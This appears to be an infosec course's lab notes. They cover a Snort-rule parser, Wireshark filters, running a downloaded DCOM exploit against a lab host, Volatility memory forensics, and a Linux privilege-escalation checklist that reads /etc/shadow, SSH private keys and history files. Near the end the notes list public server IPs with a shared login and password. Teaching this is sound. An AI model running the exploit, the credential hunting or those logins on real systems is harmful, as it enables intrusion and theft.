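    """Return (header dict, [(keyword, value), ...]) for one rule."""
    # Normalise typographic quotes (as pasted into lab text) and join
    # backslash-continued lines into a single line.
    text = rule_text.replace("\u201c", '"').replace("\u201d", '"')
    text = " ".join(ln.strip().rstrip("\\").strip() for ln in text.strip().splitlines())
    open_paren, close_paren = text.index("("), text.rindex(")")
    tokens = text[:open_paren].split()
    if len(tokens) != len(HEADER_FIELDS):
        raise ValueError("expected %d header fields, got %r" % (len(HEADER_FIELDS), tokens))
    header = dict(zip(HEADER_FIELDS, tokens))
    options = []
    for opt in _split_options(text[open_paren + 1:close_paren]):
        keyword, _, value = opt.partition(":")
        options.append((keyword.strip(), value.strip().strip('"')))
    return header, options


def summarize(rule_text):
    """Flatten the parse into the fields an analyst looks at first."""
    header, options = parse_snort_rule(rule_text)
    by_key = {}
    for keyword, value in options:
        by_key.setdefault(keyword, []).append(value)
    summary = dict(header)
    summary["msg"] = by_key.get("msg", [""])[0]          # Field 8
    summary["flow"] = by_key.get("flow", [""])[0]
    summary["sid"] = int(by_key["sid"][0])
    summary["rev"] = int(by_key.get("rev", ["0"])[0])
    summary["contents"] = by_key.get("content", [])      # ordered byte patterns
    summary["reference"] = by_key.get("reference", [])
    return summary


if __name__ == "__main__":
    for key, value in summarize(RULE_2192).items():
        print("%-10s %s" % (key, value))
```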
  1523.  
  1524.  
  1525.  
  1526. From your Linux machine ping your Windows machine
  1527. ---------------------------Type This-----------------------------------
  1528. ping 192.168.11.1
  1529. -----------------------------------------------------------------------
  1530.  
  1531.  
  1532. Start wireshark and let's create some simple filters:
  1533.  
  1534. Filter 1:
  1535. ---------------------------Type This-----------------------------------
  1536. ip.addr==192.168.11.1
  1537. -----------------------------------------------------------------------
  1538.  
  1539. Filter 2:
  1540. ---------------------------Type This-----------------------------------
  1541. ip.addr==192.168.11.1 && icmp
  1542. -----------------------------------------------------------------------
  1543.  
  1544.  
  1545. Filter 3:
  1546. ---------------------------Type This-----------------------------------
  1547. ip.addr==192.168.11.1 && !(tcp.port==22)
  1548. -----------------------------------------------------------------------
  1549. Now stop your capture and restart it (make sure you keep the filter)
  1550.  
  1551.  
  1552.  
  1553.  
  1554. Back to your Linux machine:
  1555. [ CTRL-C ] - to stop your ping
  1556. ---------------------------Type This-----------------------------------
  1557. wget http://downloads.securityfocus.com/vulnerabilities/exploits/oc192-dcom.c
  1558.  
  1559.  
  1560. gcc -o exploit oc192-dcom.c
  1561.  
  1562. ./exploit
  1563.  
  1564.  
  1565. ./exploit -d 192.168.11.1 -t 0
  1566. -----------------------------------------------------------------------
  1567.  
  1568.  
  1569.  
  1570. Now go back to WireShark and stop the capture.
  1571.  
  1572.  
  1573.  
  1574.  
  1575. ###################
  1576. # Memory Analysis #
  1577. ###################
  1578. ---------------------------Type This-----------------------------------
  1579. cd ~/Desktop/
  1580.  
  1581. sudo apt-get install -y foremost tcpxtract
  1582.  
  1583. wget https://s3.amazonaws.com/infosecaddictsfiles/hn_forensics.vmem
  1584.  
  1585. git clone https://github.com/volatilityfoundation/volatility.git
  1586.  
  1587. cd volatility
  1588. sudo pip install distorm3
  1589. sudo python setup.py install
  1590. python vol.py -h
  1591. python vol.py pslist -f ~/Desktop/hn_forensics.vmem
  1592. python vol.py connscan -f ~/Desktop/hn_forensics.vmem
  1593. mkdir dump/
  1594. mkdir -p output/pdf/
  1595. python vol.py -f ~/Desktop/hn_forensics.vmem memdmp -p 888 -D dump/
  1596. python vol.py -f ~/Desktop/hn_forensics.vmem memdmp -p 1752 -D dump/
  1597. ***Takes a few min***
  1598. strings 1752.dmp | grep "^http://" | sort | uniq
  1599. strings 1752.dmp | grep "Ahttps://" | uniq -u
  1600. cd ..
  1601. foremost -i ~/Desktop/volatility/dump/1752.dmp -t pdf -o output/pdf/
  1602. cd ~/Desktop/volatility/output/pdf/
  1603. cat audit.txt
  1604. cd pdf
  1605. ls
  1606. grep -i javascript *.pdf
  1607.  
  1608.  
  1609.  
  1610. cd ~/Desktop/volatility/output/pdf/
  1611. wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
  1612. unzip pdf-parser_V0_6_4.zip
  1613. python pdf-parser.py -s javascript --raw pdf/00601560.pdf
  1614. python pdf-parser.py --object 11 00600328.pdf
  1615. python pdf-parser.py --object 1054 --raw --filter 00601560.pdf > malicious.js
  1616.  
  1617. cat malicious.js
  1618. -----------------------------------------------------------------------
  1619.  
  1620.  
  1621.  
  1622.  
  1623. *****Sorry - no time to cover javascript de-obfuscation today*****
  1624.  
  1625.  
  1626.  
  1627.  
  1628. ---------------------------Type This-----------------------------------
  1629. cd ~/Desktop/volatility
  1630. mkdir files2/
  1631. python vol.py -f ~/Desktop/hn_forensics.vmem dumpfiles -D files2/
  1632. python vol.py hivescan -f ~/Desktop/hn_forensics.vmem
  1633. python vol.py printkey -o 0xe1526748 -f ~/Desktop/hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
  1634. -----------------------------------------------------------------------
  1635.  
  1636.  
  1637. ######################
  1638. # Intro to Reversing #
  1639. ######################
  1640. Lab walk-through documents are in the zip file along with the executables that need to be reversed:
  1641. https://s3.amazonaws.com/infosecaddictsfiles/Lena151.zip
  1642.  
  1643.  
  1644.  
  1645.  
  1646.  
  1647. ##############################
  1648. # Linux For InfoSec Homework #
  1649. ##############################
  1650. In order to receive your certificate of attendance you must complete all of the quizzes on the http://linuxsurvival.com/linux-tutorial-introduction/ website.
  1651.  
  1652.  
  1653. Submit the results via email in an MS Word document (naming convention example: YourFirstName-YourLastName-Linux-For-InfoSec-Homework.docx).
  1654.  
  1655.  
  1656.  
  1657.  
  1658. ###############################
  1659. # Linux For InfoSec Challenge #
  1660. ###############################
  1661.  
  1662. In order to receive your certificate of proficiency you must complete all of the tasks covered in the Linux For InfoSec pastebin (http://pastebin.com/eduSfPy3).
  1663.  
  1664. Submit the results via email in an MS Word document (naming convention example: YourFirstName-YourLastName-Linux-For-InfoSec-Challenge.docx).
  1665.  
  1666.  
  1667.  
  1668.  
  1669. IMPORTANT NOTE:
  1670. Your homework/challenge must be submitted via email to both (joe-at-strategicsec-.-com and ivana-at-strategicsec-.-com) by midnight EST.
  1671.  
  1672.  
  1673. #########################################################################
  1674. # What kind of Linux am I on and how can I find out? #
  1675. # Great reference: #
  1676. # https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ #
  1677. #########################################################################
  1678. - What’s the distribution type? What version?
  1679. -------------------------------------------
  1680. cat /etc/issue
  1681. cat /etc/*-release
  1682. cat /etc/lsb-release # Debian based
  1683. cat /etc/redhat-release # Redhat based
  1684.  
  1685.  
  1686.  
  1687. - What’s the kernel version? Is it 64-bit?
  1688. -------------------------------------------
  1689. cat /proc/version
  1690. uname -a
  1691. uname -mrs
  1692. rpm -q kernel
  1693. dmesg | grep Linux
  1694. ls /boot | grep vmlinuz-
  1695.  
  1696.  
  1697.  
  1698. - What can be learnt from the environmental variables?
  1699. ----------------------------------------------------
  1700. cat /etc/profile
  1701. cat /etc/bashrc
  1702. cat ~/.bash_profile
  1703. cat ~/.bashrc
  1704. cat ~/.bash_logout
  1705. env
  1706. set
  1707.  
  1708.  
  1709. - What services are running? Which service has which user privilege?
  1710. ------------------------------------------------------------------
  1711. ps aux
  1712. ps -ef
  1713. top
  1714. cat /etc/services
  1715.  
  1716.  
  1717. - Which service(s) are being run by root? Of these services, which are vulnerable - it’s worth a double check!
  1718. ---------------------------------------------------------------------------------------------------------------
  1719. ps aux | grep root
  1720. ps -ef | grep root
  1721.  
  1722.  
  1723.  
  1724. - What applications are installed? What version are they? Are they currently running?
  1725. ------------------------------------------------------------------------------------
  1726. ls -alh /usr/bin/
  1727. ls -alh /sbin/
  1728. dpkg -l
  1729. rpm -qa
  1730. ls -alh /var/cache/apt/archives
  1731. ls -alh /var/cache/yum/
  1732.  
  1733.  
  1734. - Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
  1735. ------------------------------------------------------------------------------------
  1736. cat /etc/syslog.conf
  1737. cat /etc/chttp.conf
  1738. cat /etc/lighttpd.conf
  1739. cat /etc/cups/cupsd.conf
  1740. cat /etc/inetd.conf
  1741. cat /etc/apache2/apache2.conf
  1742. cat /etc/my.conf
  1743. cat /etc/httpd/conf/httpd.conf
  1744. cat /opt/lampp/etc/httpd.conf
  1745. ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'
  1746.  
  1747.  
  1748.  
  1749. - What jobs are scheduled?
  1750. ------------------------
  1751. crontab -l
  1752. ls -alh /var/spool/cron
  1753. ls -al /etc/ | grep cron
  1754. ls -al /etc/cron*
  1755. cat /etc/cron*
  1756. cat /etc/at.allow
  1757. cat /etc/at.deny
  1758. cat /etc/cron.allow
  1759. cat /etc/cron.deny
  1760. cat /etc/crontab
  1761. cat /etc/anacrontab
  1762. cat /var/spool/cron/crontabs/root
  1763.  
  1764.  
  1765. - Any plain text usernames and/or passwords?
  1766. ------------------------------------------
  1767. grep -i user [filename]
  1768. grep -i pass [filename]
  1769. grep -C 5 "password" [filename]
  1770. find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password' # Search for Joomla passwords (single quotes so the shell does not expand $password)
  1771.  
  1772.  
- What NIC(s) does the system have? Is it connected to another network?
---------------------------------------------------------------------
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network


- What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
------------------------------------------------------------------------------------------------------------------------
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

- What other users & hosts are communicating with the system?
-----------------------------------------------------------
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w



- What's cached? IP and/or MAC addresses
-------------------------------------
arp -e
route
/sbin/route -nee


- Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
------------------------------------------------------------------------------------------
id
who
w
last
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l
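The one-liners above answer the "who can do what?" question by eyeballing /etc/passwd. The script below is an added example (not part of the original notes) that turns the same checks into reusable functions an auditor can run against a passwd-format file: all UID-0 accounts, UID-0 accounts that are not root, accounts with an empty password field, and accounts with an interactive shell. The sample file is constructed inline so it runs offline; pass /etc/passwd on a real host.

```shell
#!/bin/sh
# Added example, not from the original notes. Audits a passwd-format file.

# Constructed sample passwd file (not a real host's file) so the script runs offline.
SAMPLE_PASSWD=$(mktemp)
cat > "$SAMPLE_PASSWD" <<'EOF'
# constructed sample, not a real host's file
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
toor:x:0:0:second admin:/root:/bin/bash
pmrf:x:1000:1000:PMRF student:/home/pmrf:/bin/bash
guest::1001:1001:no password set:/home/guest:/bin/sh
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
EOF

# Usernames whose numeric UID is 0, one per line.
# Comment lines, blank lines and malformed lines (fewer than 7 fields) are
# skipped; the UID is compared numerically, so "00" would also count.
uid0_accounts() {
    awk -F: '/^#/ || NF < 7 { next } $3 ~ /^[0-9]+$/ && $3+0 == 0 { print $1 }' "$1"
}

# UID-0 accounts other than root. Any hit here needs an explanation:
# a second superuser account is a classic persistence artifact.
extra_superusers() {
    uid0_accounts "$1" | grep -v -x root || true
}

# Accounts whose password field is empty (no "x" shadow marker and no hash).
# Depending on PAM settings such an account may log in with no password at all.
empty_password_accounts() {
    awk -F: '/^#/ || NF < 7 { next } $2 == "" { print $1 }' "$1"
}

# Accounts whose login shell is not nologin/false, i.e. accounts that can get an
# interactive session. This is the list to compare against `last` and `w` output.
interactive_accounts() {
    awk -F: '/^#/ || NF < 7 { next } $7 !~ /(nologin|false)$/ { print $1 }' "$1"
}

echo "UID 0 accounts:";           uid0_accounts "$SAMPLE_PASSWD"
echo "UID 0 accounts not root:";  extra_superusers "$SAMPLE_PASSWD"
echo "Empty password field:";     empty_password_accounts "$SAMPLE_PASSWD"
echo "Interactive shells:";       interactive_accounts "$SAMPLE_PASSWD"
```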



- What sensitive files can be found?
----------------------------------
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/



- Anything “interesting” in the home directory(ies)? If it’s possible to access them
----------------------------------------------------------------------------
ls -ahlR /root/
ls -ahlR /home/


- Are there any passwords in scripts, databases, configuration files or log files? Default paths and locations for passwords
---------------------------------------------------------------------------------------------------------------------------
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg


- What has the user been doing? Is there any password in plain text? What have they been editing?
-----------------------------------------------------------------------------------------------
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history



- What user information can be found?
-----------------------------------
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root


- Can private-key information be found?
-------------------------------------
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key


- Any (hidden) settings/files on the website? Any settings file with database information?
------------------------------------------------------------------------------------
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/


- Is there anything in the log file(s)? (Could help with “Local File Includes”!)
-----------------------------------------------------------------------------
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/

- Note: other log files under /var/log worth reviewing: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp





########################################################################################################################################





####################################
# Day 2: Building a Perfect Server #
####################################
-------------------------------------------
Task 1: Log in to your respective Linux server
PMRF1 (Hugo/Ross)
45.76.61.100
pmrf aegisashore

PMRF2 (steve/jeff)
155.138.213.248
pmrf aegisashore


PMRF3 (elaine)
155.138.198.202
pmrf aegisashore



Task 2: Build the Perfect Server
https://www.howtoforge.com/tutorial/perfect-server-centos-7-apache-mysql-php-pureftpd-postfix-dovecot-and-ispconfig/

Important notes:
Steps to skip
skip all of step 1
skip all of step 2
skip all of step 3
skip all of step 5

Important notes:
Step 11: amavisd may not work. If it doesn't, just keep moving forward.
---------------------------------------------